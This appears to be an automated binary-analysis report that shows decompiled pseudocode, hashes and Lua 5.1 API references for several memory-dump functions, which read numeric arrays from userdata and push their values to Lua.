Opcode ID: 769731947fbe71d43b7309afd703be353348602c5f291ec907ef303549534b05
Instruction ID: 0e8b6e912f6279f1f3f4249207a72318203ebbe333116af8e9244c14e10777d2
Opcode Fuzzy Hash: 769731947fbe71d43b7309afd703be353348602c5f291ec907ef303549534b05
Instruction Fuzzy Hash: 5321D8795083066BE310DB34DC85E7F73D8EB802A4F140A2DF954865C2EB3AF90987E2

Uniqueness

Uniqueness Score: -1.00%

Function 00A23840, Relevance: 12.1, APIs: 8, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00A23840(intOrPtr __eax, long long __fp0, intOrPtr _a4) {
				intOrPtr _v12;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t16;
				signed int _t20;
				signed int _t23;
				void* _t26;
				void* _t27;
				void* _t28;
				long long* _t29;
				long long _t32;

				_t32 = __fp0;
				_t6 = __eax;
				_t16 = _a4;
				_push(1);
				_push(_t16);
				L00A23F4A();
				_t26 = (_t23 & 0xffffffc0) - 0x34 + 8;
				if(__eax != 0) {
					_push(2);
					_push(1);
					_push(_t16);
					L00A23F92();
					_push(_t16);
					L00A23F38();
					_t27 = _t26 + 0x10;
					if(__eax < 2) {
						L5:
						_t11 = 1;
					} else {
						_push(2);
						_push(_t16);
						L00A23F4A();
						_t27 = _t27 + 8;
						if(__eax == 0) {
							goto L5;
						} else {
							_push(2);
							_push(_t16);
							L00A23FCE();
							_t27 = _t27 + 8;
							_t11 = __eax;
						}
					}
					_push(1);
					_push(_t16);
					L00A23F0E();
					_t28 = _t27 + 8;
					_t20 = 0;
					_v12 = _t6;
					if(_t11 > 0) {
						do {
							asm("fild dword [eax+esi*4]");
							if( *((intOrPtr*)(_v12 + _t20 * 4)) < 0) {
								_t32 = _t32 +  *0xa25878;
							}
							_t29 = _t28 - 8;
							 *_t29 = _t32;
							_push(_t16);
							L00A23F80();
							_t20 = _t20 + 1;
							_t28 = _t29 + 0xc;
						} while (_t20 < _t11);
					}
					return _t11;
				} else {
					_push(_t16);
					L00A23F74();
					return 1;
				}
			}

0x00a23840
0x00a23840
0x00a2384c
0x00a2384f
0x00a23851
0x00a23852
0x00a23857
0x00a2385c
0x00a23873
0x00a23875
0x00a23877
0x00a23878
0x00a2387d
0x00a2387e
0x00a23883
0x00a23889
0x00a238a9
0x00a238a9
0x00a2388b
0x00a2388b
0x00a2388d
0x00a2388e
0x00a23893
0x00a23898
0x00000000
0x00a2389a
0x00a2389a
0x00a2389c
0x00a2389d
0x00a238a2
0x00a238a5
0x00a238a5
0x00a23898
0x00a238ae
0x00a238b0
0x00a238b1
0x00a238b6
0x00a238b9
0x00a238bd
0x00a238c1
0x00a238c3
0x00a238ca
0x00a238cf
0x00a238d1
0x00a238d1
0x00a238d7
0x00a238da
0x00a238dd
0x00a238de
0x00a238e3
0x00a238e6
0x00a238e9
0x00a238c3
0x00a238f5
0x00a2385e
0x00a2385e
0x00a2385f
0x00a23872
0x00a23872

APIs

lua_type.LUA5.1(?,00000001), ref: 00A23852
lua_pushnil.LUA5.1(?), ref: 00A2385F
luaL_checktype.LUA5.1(?,00000001,00000002), ref: 00A23878
lua_gettop.LUA5.1(?,?,00000001,00000002), ref: 00A2387E
lua_type.LUA5.1(?,00000002), ref: 00A2388E
luaL_checkinteger.LUA5.1(?,00000002), ref: 00A2389D
lua_touserdata.LUA5.1(?,00000001), ref: 00A238B1
lua_pushnumber.LUA5.1(?), ref: 00A238DE

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_checkinteger.L_checktype.lua_gettop.lua_pushnil.lua_pushnumber.lua_touserdata.
String ID:
API String ID: 3663841464-0
Opcode ID: e0a5959748b3594ffc41359415a763a894ef7a6c8ea4d8c25103b43273c2b722
Instruction ID: 25431deac4e837ecfb523a9bbb0dd3e3b4a53adec259608087a83dadc4b25e67
Opcode Fuzzy Hash: e0a5959748b3594ffc41359415a763a894ef7a6c8ea4d8c25103b43273c2b722
Instruction Fuzzy Hash: 0311C463E1422026DE20376D7EC3B7E72689B93B11F400179FE09DE282FA4A8B1551A3

Uniqueness

Uniqueness Score: -1.00%

Function 009C1FA0, Relevance: 12.1, APIs: 8, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E009C1FA0(intOrPtr __eax, long long __fp0, intOrPtr _a4) {
				char _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				void* _v536;
				char* _t12;
				char _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				char* _t18;
				intOrPtr _t21;
				char* _t22;
				void* _t23;
				void* _t25;
				long long* _t26;
				long long _t30;

				_t30 = __fp0;
				_t17 = _a4;
				_push(1);
				_push(_t17);
				_v536 = 0;
				L009C2132();
				L009C2150();
				_t21 = __eax;
				_t12 =  &_v536;
				_push(_t12);
				_push(0);
				_push(2);
				_push(_t17);
				L009C212C();
				_t18 = _v536;
				_t22 = _t12;
				_t25 =  &_v536 + 0x18;
				_t23 = _t22 + _t18;
				if(_t22 != 0) {
					_push( &_v524);
					_push(_t17);
					L009C211A();
					_t26 = _t25 + 8;
					while(_t22 < _t23) {
						_t14 =  *_t22;
						_t18 =  &_v524;
						_t22 = _t22 + 1;
						_t15 = E009C2070(_t14, _t21, _t18);
						_t26 = _t26 + 0xc;
						_t21 = _t15;
					}
					_push( &_v524);
					L009C2108();
					_v532 = _t21;
					_v528 = 0;
					asm("fild qword [esp+0x18]");
					_push(_t18);
					 *_t26 = _t30;
					_push(_t17);
					L009C2102();
					return 2;
				} else {
					_push(_t17);
					L009C2120();
					_push(0x40000000);
					_push(_t22);
					_push(_t17);
					L009C2102();
					return 2;
				}
			}

0x009c1fa0
0x009c1fa7
0x009c1fb1
0x009c1fb3
0x009c1fb4
0x009c1fbc
0x009c1fc1
0x009c1fc6
0x009c1fc8
0x009c1fcc
0x009c1fcd
0x009c1fcf
0x009c1fd1
0x009c1fd2
0x009c1fd7
0x009c1fdb
0x009c1fdd
0x009c1fe2
0x009c1fe5
0x009c2010
0x009c2011
0x009c2012
0x009c2017
0x009c201c
0x009c201e
0x009c2021
0x009c2025
0x009c2029
0x009c202e
0x009c2033
0x009c2033
0x009c203b
0x009c203c
0x009c2041
0x009c2045
0x009c204d
0x009c2051
0x009c2052
0x009c2055
0x009c2056
0x009c206d
0x009c1fe7
0x009c1fe7
0x009c1fe8
0x009c1fed
0x009c1ff2
0x009c1ff3
0x009c1ff4
0x009c200b
0x009c200b

APIs

luaL_checknumber.LUA5.1 ref: 009C1FBC
_ftol.MSVCRT ref: 009C1FC1
luaL_optlstring.LUA5.1(?,00000002,00000000,00000000), ref: 009C1FD2
lua_pushnil.LUA5.1(?), ref: 009C1FE8
lua_pushnumber.LUA5.1(?,00000000,40000000,?), ref: 009C1FF4
luaL_buffinit.LUA5.1(?,?), ref: 009C2012
luaL_pushresult.LUA5.1(?), ref: 009C203C
lua_pushnumber.LUA5.1(?), ref: 009C2056

Memory Dump Source

Source File: 00000003.00000002.486890418.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.486863680.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486943477.00000000009C3000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486972534.00000000009C4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487005169.00000000009C5000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$L_buffinit.L_checknumber.L_optlstring.L_pushresult._ftollua_pushnil.
String ID:
API String ID: 1290838670-0
Opcode ID: a66d3bd197960f9c06a205bee34f2b53ac85449f397ce4c7d84c0c5e157af5fb
Instruction ID: 14e360c219c92e28722a62cadc46d9ad922473421f33aebf5b4d5365ddda126a
Opcode Fuzzy Hash: a66d3bd197960f9c06a205bee34f2b53ac85449f397ce4c7d84c0c5e157af5fb
Instruction Fuzzy Hash: C511E6B2D083012AD320BB249CC6FABBB9CDBE4350F88091EFA9552143D939950987E3

Uniqueness

Uniqueness Score: -1.00%

Function 00A23780, Relevance: 12.1, APIs: 8, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00A23780(intOrPtr __eax, long long __fp0, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t16;
				void* _t20;
				signed int _t23;
				void* _t26;
				void* _t27;
				void* _t28;
				long long* _t29;
				long long _t32;

				_t32 = __fp0;
				_t6 = __eax;
				_t16 = _a4;
				_push(1);
				_push(_t16);
				L00A23F4A();
				_t26 = (_t23 & 0xffffffc0) - 0x34 + 8;
				if(__eax != 0) {
					_push(2);
					_push(1);
					_push(_t16);
					L00A23F92();
					_push(_t16);
					L00A23F38();
					_t27 = _t26 + 0x10;
					if(__eax < 2) {
						L5:
						_t11 = 1;
					} else {
						_push(2);
						_push(_t16);
						L00A23F4A();
						_t27 = _t27 + 8;
						if(__eax == 0) {
							goto L5;
						} else {
							_push(2);
							_push(_t16);
							L00A23FCE();
							_t27 = _t27 + 8;
							_t11 = __eax;
						}
					}
					_push(1);
					_push(_t16);
					L00A23F0E();
					_t28 = _t27 + 8;
					_t20 = 0;
					_v12 = _t6;
					if(_t11 > 0) {
						do {
							_v8 =  *((char*)(_t20 + _v12));
							_t29 = _t28 - 8;
							asm("fild dword [esp+0x44]");
							 *_t29 = _t32;
							_push(_t16);
							L00A23F80();
							_t20 = _t20 + 1;
							_t28 = _t29 + 0xc;
						} while (_t20 < _t11);
					}
					return _t11;
				} else {
					_push(_t16);
					L00A23F74();
					return 1;
				}
			}

0x00a23780
0x00a23780
0x00a2378c
0x00a2378f
0x00a23791
0x00a23792
0x00a23797
0x00a2379c
0x00a237b3
0x00a237b5
0x00a237b7
0x00a237b8
0x00a237bd
0x00a237be
0x00a237c3
0x00a237c9
0x00a237e9
0x00a237e9
0x00a237cb
0x00a237cb
0x00a237cd
0x00a237ce
0x00a237d3
0x00a237d8
0x00000000
0x00a237da
0x00a237da
0x00a237dc
0x00a237dd
0x00a237e2
0x00a237e5
0x00a237e5
0x00a237d8
0x00a237ee
0x00a237f0
0x00a237f1
0x00a237f6
0x00a237f9
0x00a237fd
0x00a23801
0x00a23803
0x00a2380b
0x00a2380f
0x00a23812
0x00a23816
0x00a23819
0x00a2381a
0x00a2381f
0x00a23822
0x00a23825
0x00a23803
0x00a23831
0x00a2379e
0x00a2379e
0x00a2379f
0x00a237b2
0x00a237b2

APIs

lua_type.LUA5.1(?,00000001), ref: 00A23792
lua_pushnil.LUA5.1(?), ref: 00A2379F
luaL_checktype.LUA5.1(?,00000001,00000002), ref: 00A237B8
lua_gettop.LUA5.1(?,?,00000001,00000002), ref: 00A237BE
lua_type.LUA5.1(?,00000002), ref: 00A237CE
luaL_checkinteger.LUA5.1(?,00000002), ref: 00A237DD
lua_touserdata.LUA5.1(?,00000001), ref: 00A237F1
lua_pushnumber.LUA5.1(?), ref: 00A2381A

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_checkinteger.L_checktype.lua_gettop.lua_pushnil.lua_pushnumber.lua_touserdata.
String ID:
API String ID: 3663841464-0
Opcode ID: 30dfce2e50ad962d6d3e3a5d618555fa28c6147dd2fb81a49e2b33b5d3831f8b
Instruction ID: 3a193011f0592cfa8487e761fbe18ca63cd4c34fb798811a83a05c0c602833e7
Opcode Fuzzy Hash: 30dfce2e50ad962d6d3e3a5d618555fa28c6147dd2fb81a49e2b33b5d3831f8b
Instruction Fuzzy Hash: 8D11E3F3E1422022DE20662D7EC3B7E76788B93B11F400539FE0999281F64A8B1542E3

Uniqueness

Uniqueness Score: -1.00%

Function 00A236C0, Relevance: 12.1, APIs: 8, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00A236C0(intOrPtr __eax, long long __fp0, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _t7;
				intOrPtr _t12;
				intOrPtr _t17;
				signed int _t21;
				signed int _t24;
				void* _t27;
				void* _t28;
				void* _t29;
				long long* _t30;
				long long _t33;

				_t33 = __fp0;
				_t7 = __eax;
				_t17 = _a4;
				_push(1);
				_push(_t17);
				L00A23F4A();
				_t27 = (_t24 & 0xffffffc0) - 0x34 + 8;
				if(__eax != 0) {
					_push(2);
					_push(1);
					_push(_t17);
					L00A23F92();
					_push(_t17);
					L00A23F38();
					_t28 = _t27 + 0x10;
					if(__eax < 2) {
						L5:
						_t12 = 1;
					} else {
						_push(2);
						_push(_t17);
						L00A23F4A();
						_t28 = _t28 + 8;
						if(__eax == 0) {
							goto L5;
						} else {
							_push(2);
							_push(_t17);
							L00A23FCE();
							_t28 = _t28 + 8;
							_t12 = __eax;
						}
					}
					_push(1);
					_push(_t17);
					L00A23F0E();
					_t29 = _t28 + 8;
					_t21 = 0;
					_v12 = _t7;
					if(_t12 > 0) {
						do {
							_v8 =  *(_v12 + _t21 * 2) & 0x0000ffff;
							_t30 = _t29 - 8;
							asm("fild dword [esp+0x44]");
							 *_t30 = _t33;
							_push(_t17);
							L00A23F80();
							_t21 = _t21 + 1;
							_t29 = _t30 + 0xc;
						} while (_t21 < _t12);
					}
					return _t12;
				} else {
					_push(_t17);
					L00A23F74();
					return 1;
				}
			}

0x00a236c0
0x00a236c0
0x00a236cc
0x00a236cf
0x00a236d1
0x00a236d2
0x00a236d7
0x00a236dc
0x00a236f3
0x00a236f5
0x00a236f7
0x00a236f8
0x00a236fd
0x00a236fe
0x00a23703
0x00a23709
0x00a23729
0x00a23729
0x00a2370b
0x00a2370b
0x00a2370d
0x00a2370e
0x00a23713
0x00a23718
0x00000000
0x00a2371a
0x00a2371a
0x00a2371c
0x00a2371d
0x00a23722
0x00a23725
0x00a23725
0x00a23718
0x00a2372e
0x00a23730
0x00a23731
0x00a23736
0x00a23739
0x00a2373d
0x00a23741
0x00a23743
0x00a2374b
0x00a2374f
0x00a23752
0x00a23756
0x00a23759
0x00a2375a
0x00a2375f
0x00a23762
0x00a23765
0x00a23743
0x00a23771
0x00a236de
0x00a236de
0x00a236df
0x00a236f2
0x00a236f2

APIs

lua_type.LUA5.1(?,00000001), ref: 00A236D2
lua_pushnil.LUA5.1(?), ref: 00A236DF
luaL_checktype.LUA5.1(?,00000001,00000002), ref: 00A236F8
lua_gettop.LUA5.1(?,?,00000001,00000002), ref: 00A236FE
lua_type.LUA5.1(?,00000002), ref: 00A2370E
luaL_checkinteger.LUA5.1(?,00000002), ref: 00A2371D
lua_touserdata.LUA5.1(?,00000001), ref: 00A23731
lua_pushnumber.LUA5.1(?), ref: 00A2375A

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_checkinteger.L_checktype.lua_gettop.lua_pushnil.lua_pushnumber.lua_touserdata.
String ID:
API String ID: 3663841464-0
Opcode ID: b0710427f965817d57ae32e3cfa81d16c09c92195e23790d36628fe8da21cc6e
Instruction ID: a130e5ed507bfcf38fa272dd3688ab90fb481f3f25cacb7799209a120d9b6ab3
Opcode Fuzzy Hash: b0710427f965817d57ae32e3cfa81d16c09c92195e23790d36628fe8da21cc6e
Instruction Fuzzy Hash: 3F11E7E3E1422032DE20761D7EC3B7E76789B97B51F444139FE4999281F64A8B1541E3

Uniqueness

Uniqueness Score: -1.00%

Function 00A23600, Relevance: 12.1, APIs: 8, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00A23600(intOrPtr __eax, long long __fp0, intOrPtr _a4) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _t7;
				intOrPtr _t12;
				intOrPtr _t17;
				signed int _t21;
				signed int _t24;
				void* _t27;
				void* _t28;
				void* _t29;
				long long* _t30;
				long long _t33;

				_t33 = __fp0;
				_t7 = __eax;
				_t17 = _a4;
				_push(1);
				_push(_t17);
				L00A23F4A();
				_t27 = (_t24 & 0xffffffc0) - 0x34 + 8;
				if(__eax != 0) {
					_push(2);
					_push(1);
					_push(_t17);
					L00A23F92();
					_push(_t17);
					L00A23F38();
					_t28 = _t27 + 0x10;
					if(__eax < 2) {
						L5:
						_t12 = 1;
					} else {
						_push(2);
						_push(_t17);
						L00A23F4A();
						_t28 = _t28 + 8;
						if(__eax == 0) {
							goto L5;
						} else {
							_push(2);
							_push(_t17);
							L00A23FCE();
							_t28 = _t28 + 8;
							_t12 = __eax;
						}
					}
					_push(1);
					_push(_t17);
					L00A23F0E();
					_t29 = _t28 + 8;
					_t21 = 0;
					_v12 = _t7;
					if(_t12 > 0) {
						do {
							_v8 =  *((short*)(_v12 + _t21 * 2));
							_t30 = _t29 - 8;
							asm("fild dword [esp+0x44]");
							 *_t30 = _t33;
							_push(_t17);
							L00A23F80();
							_t21 = _t21 + 1;
							_t29 = _t30 + 0xc;
						} while (_t21 < _t12);
					}
					return _t12;
				} else {
					_push(_t17);
					L00A23F74();
					return 1;
				}
			}

0x00a23600
0x00a23600
0x00a2360c
0x00a2360f
0x00a23611
0x00a23612
0x00a23617
0x00a2361c
0x00a23633
0x00a23635
0x00a23637
0x00a23638
0x00a2363d
0x00a2363e
0x00a23643
0x00a23649
0x00a23669
0x00a23669
0x00a2364b
0x00a2364b
0x00a2364d
0x00a2364e
0x00a23653
0x00a23658
0x00000000
0x00a2365a
0x00a2365a
0x00a2365c
0x00a2365d
0x00a23662
0x00a23665
0x00a23665
0x00a23658
0x00a2366e
0x00a23670
0x00a23671
0x00a23676
0x00a23679
0x00a2367d
0x00a23681
0x00a23683
0x00a2368b
0x00a2368f
0x00a23692
0x00a23696
0x00a23699
0x00a2369a
0x00a2369f
0x00a236a2
0x00a236a5
0x00a23683
0x00a236b1
0x00a2361e
0x00a2361e
0x00a2361f
0x00a23632
0x00a23632

APIs

lua_type.LUA5.1(?,00000001), ref: 00A23612
lua_pushnil.LUA5.1(?), ref: 00A2361F
luaL_checktype.LUA5.1(?,00000001,00000002), ref: 00A23638
lua_gettop.LUA5.1(?,?,00000001,00000002), ref: 00A2363E
lua_type.LUA5.1(?,00000002), ref: 00A2364E
luaL_checkinteger.LUA5.1(?,00000002), ref: 00A2365D
lua_touserdata.LUA5.1(?,00000001), ref: 00A23671
lua_pushnumber.LUA5.1(?), ref: 00A2369A

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_checkinteger.L_checktype.lua_gettop.lua_pushnil.lua_pushnumber.lua_touserdata.
String ID:
API String ID: 3663841464-0
Opcode ID: a83d08e08ed88f8d820d2564bc4ffa9932ff1af417cba2a6ee51fc90d7b0a19b
Instruction ID: a2f70dc6c9bcba3da13809f796d865637052b262aed9e850f12a571c87472cf3
Opcode Fuzzy Hash: a83d08e08ed88f8d820d2564bc4ffa9932ff1af417cba2a6ee51fc90d7b0a19b
Instruction Fuzzy Hash: 5811C4A3E1422032DE20261E7EC3B7F76B89B93B51F440139FE0999381F64A8B1541E3

Uniqueness

Uniqueness Score: -1.00%

Function 00A234A0, Relevance: 12.1, APIs: 8, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00A234A0(intOrPtr __eax, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t15;
				signed int _t19;
				signed int _t22;
				void* _t25;
				void* _t26;
				void* _t27;
				long long* _t28;

				_t6 = __eax;
				_t15 = _a4;
				_push(1);
				_push(_t15);
				L00A23F4A();
				_t25 = (_t22 & 0xffffffc0) - 0x34 + 8;
				if(__eax != 0) {
					_push(2);
					_push(1);
					_push(_t15);
					L00A23F92();
					_push(_t15);
					L00A23F38();
					_t26 = _t25 + 0x10;
					if(__eax < 2) {
						L5:
						_t11 = 1;
					} else {
						_push(2);
						_push(_t15);
						L00A23F4A();
						_t26 = _t26 + 8;
						if(__eax == 0) {
							goto L5;
						} else {
							_push(2);
							_push(_t15);
							L00A23FCE();
							_t26 = _t26 + 8;
							_t11 = __eax;
						}
					}
					_push(1);
					_push(_t15);
					L00A23F0E();
					_t27 = _t26 + 8;
					_t19 = 0;
					_v8 = _t6;
					if(_t11 > 0) {
						do {
							_t28 = _t27 - 8;
							 *_t28 =  *((long long*)(_v8 + _t19 * 8));
							_push(_t15);
							L00A23F80();
							_t19 = _t19 + 1;
							_t27 = _t28 + 0xc;
						} while (_t19 < _t11);
					}
					return _t11;
				} else {
					_push(_t15);
					L00A23F74();
					return 1;
				}
			}

0x00a234a0
0x00a234ac
0x00a234af
0x00a234b1
0x00a234b2
0x00a234b7
0x00a234bc
0x00a234d3
0x00a234d5
0x00a234d7
0x00a234d8
0x00a234dd
0x00a234de
0x00a234e3
0x00a234e9
0x00a23509
0x00a23509
0x00a234eb
0x00a234eb
0x00a234ed
0x00a234ee
0x00a234f3
0x00a234f8
0x00000000
0x00a234fa
0x00a234fa
0x00a234fc
0x00a234fd
0x00a23502
0x00a23505
0x00a23505
0x00a234f8
0x00a2350e
0x00a23510
0x00a23511
0x00a23516
0x00a23519
0x00a2351d
0x00a23521
0x00a23523
0x00a2352a
0x00a2352d
0x00a23530
0x00a23531
0x00a23536
0x00a23539
0x00a2353c
0x00a23523
0x00a23548
0x00a234be
0x00a234be
0x00a234bf
0x00a234d2
0x00a234d2

APIs

lua_type.LUA5.1(?,00000001), ref: 00A234B2
lua_pushnil.LUA5.1(?), ref: 00A234BF
luaL_checktype.LUA5.1(?,00000001,00000002), ref: 00A234D8
lua_gettop.LUA5.1(?,?,00000001,00000002), ref: 00A234DE
lua_type.LUA5.1(?,00000002), ref: 00A234EE
luaL_checkinteger.LUA5.1(?,00000002), ref: 00A234FD
lua_touserdata.LUA5.1(?,00000001), ref: 00A23511
lua_pushnumber.LUA5.1(?), ref: 00A23531

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_checkinteger.L_checktype.lua_gettop.lua_pushnil.lua_pushnumber.lua_touserdata.
String ID:
API String ID: 3663841464-0
Opcode ID: 42d743b6cb2bd43ce6ea698811058d7d0ce5e129efefdacd5b6438eee2e68095
Instruction ID: be81bf658667bea5f7df6363499bba78d20e944d81a2e8cd9fdebbc3097a39a0
Opcode Fuzzy Hash: 42d743b6cb2bd43ce6ea698811058d7d0ce5e129efefdacd5b6438eee2e68095
Instruction Fuzzy Hash: D111A5A3E1022036DE20362D7EC3B7E76788B97B11F444579FE09DA291F68ACB1511E3

Uniqueness

Uniqueness Score: -1.00%

Function 00A23900, Relevance: 12.1, APIs: 8, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00A23900(intOrPtr __eax, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t15;
				signed int _t19;
				signed int _t22;
				void* _t25;
				void* _t26;
				void* _t27;
				long long* _t28;

				_t6 = __eax;
				_t15 = _a4;
				_push(1);
				_push(_t15);
				L00A23F4A();
				_t25 = (_t22 & 0xffffffc0) - 0x34 + 8;
				if(__eax != 0) {
					_push(2);
					_push(1);
					_push(_t15);
					L00A23F92();
					_push(_t15);
					L00A23F38();
					_t26 = _t25 + 0x10;
					if(__eax < 2) {
						L5:
						_t11 = 1;
					} else {
						_push(2);
						_push(_t15);
						L00A23F4A();
						_t26 = _t26 + 8;
						if(__eax == 0) {
							goto L5;
						} else {
							_push(2);
							_push(_t15);
							L00A23FCE();
							_t26 = _t26 + 8;
							_t11 = __eax;
						}
					}
					_push(1);
					_push(_t15);
					L00A23F0E();
					_t27 = _t26 + 8;
					_t19 = 0;
					_v8 = _t6;
					if(_t11 > 0) {
						do {
							_t28 = _t27 - 8;
							 *_t28 =  *((intOrPtr*)(_v8 + _t19 * 4));
							_push(_t15);
							L00A23F80();
							_t19 = _t19 + 1;
							_t27 = _t28 + 0xc;
						} while (_t19 < _t11);
					}
					return _t11;
				} else {
					_push(_t15);
					L00A23F74();
					return 1;
				}
			}

0x00a23900
0x00a2390c
0x00a2390f
0x00a23911
0x00a23912
0x00a23917
0x00a2391c
0x00a23933
0x00a23935
0x00a23937
0x00a23938
0x00a2393d
0x00a2393e
0x00a23943
0x00a23949
0x00a23969
0x00a23969
0x00a2394b
0x00a2394b
0x00a2394d
0x00a2394e
0x00a23953
0x00a23958
0x00000000
0x00a2395a
0x00a2395a
0x00a2395c
0x00a2395d
0x00a23962
0x00a23965
0x00a23965
0x00a23958
0x00a2396e
0x00a23970
0x00a23971
0x00a23976
0x00a23979
0x00a2397d
0x00a23981
0x00a23983
0x00a2398a
0x00a2398d
0x00a23990
0x00a23991
0x00a23996
0x00a23999
0x00a2399c
0x00a23983
0x00a239a8
0x00a2391e
0x00a2391e
0x00a2391f
0x00a23932
0x00a23932

APIs

lua_type.LUA5.1(?,00000001), ref: 00A23912
lua_pushnil.LUA5.1(?), ref: 00A2391F
luaL_checktype.LUA5.1(?,00000001,00000002), ref: 00A23938
lua_gettop.LUA5.1(?,?,00000001,00000002), ref: 00A2393E
lua_type.LUA5.1(?,00000002), ref: 00A2394E
luaL_checkinteger.LUA5.1(?,00000002), ref: 00A2395D
lua_touserdata.LUA5.1(?,00000001), ref: 00A23971
lua_pushnumber.LUA5.1(?), ref: 00A23991

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_checkinteger.L_checktype.lua_gettop.lua_pushnil.lua_pushnumber.lua_touserdata.
String ID:
API String ID: 3663841464-0
Opcode ID: f6a16dc57c3b7cad862bc172c868a3f11ae27ae2a400e892fe91fe814e002601
Instruction ID: fcb33c765d758d418b0751ef373b2e1969d5c10993f2b582659821ee59ab711e
Opcode Fuzzy Hash: f6a16dc57c3b7cad862bc172c868a3f11ae27ae2a400e892fe91fe814e002601
Instruction Fuzzy Hash: EB11A9A3E1022036DE20365D7FC3B7E76788B97B11F440179FE59E9281F58A8B5511E3

Uniqueness

Uniqueness Score: -1.00%

Function 00A23550, Relevance: 12.1, APIs: 8, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00A23550(intOrPtr __eax, long long __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t4;
				intOrPtr _t9;
				intOrPtr _t13;
				void* _t17;
				signed int _t20;
				void* _t23;
				void* _t24;
				void* _t25;
				long long* _t26;
				long long _t29;

				_t29 = __fp0;
				_t4 = __eax;
				_t13 = _a4;
				_push(1);
				_push(_t13);
				L00A23F4A();
				_t23 = (_t20 & 0xffffffc0) - 0x34 + 8;
				if(__eax != 0) {
					_push(2);
					_push(1);
					_push(_t13);
					L00A23F92();
					_push(_t13);
					L00A23F38();
					_t24 = _t23 + 0x10;
					if(__eax < 2) {
						L5:
						_t9 = 1;
					} else {
						_push(2);
						_push(_t13);
						L00A23F4A();
						_t24 = _t24 + 8;
						if(__eax == 0) {
							goto L5;
						} else {
							_push(2);
							_push(_t13);
							L00A23FCE();
							_t24 = _t24 + 8;
							_t9 = __eax;
						}
					}
					_push(1);
					_push(_t13);
					L00A23F0E();
					_t25 = _t24 + 8;
					_t17 = 0;
					_v8 = _t4;
					if(_t9 > 0) {
						do {
							asm("fild dword [eax+esi*4]");
							_t26 = _t25 - 8;
							 *_t26 = _t29;
							_push(_t13);
							L00A23F80();
							_t17 = _t17 + 1;
							_t25 = _t26 + 0xc;
						} while (_t17 < _t9);
					}
					return _t9;
				} else {
					_push(_t13);
					L00A23F74();
					return 1;
				}
			}

0x00a23550
0x00a23550
0x00a2355c
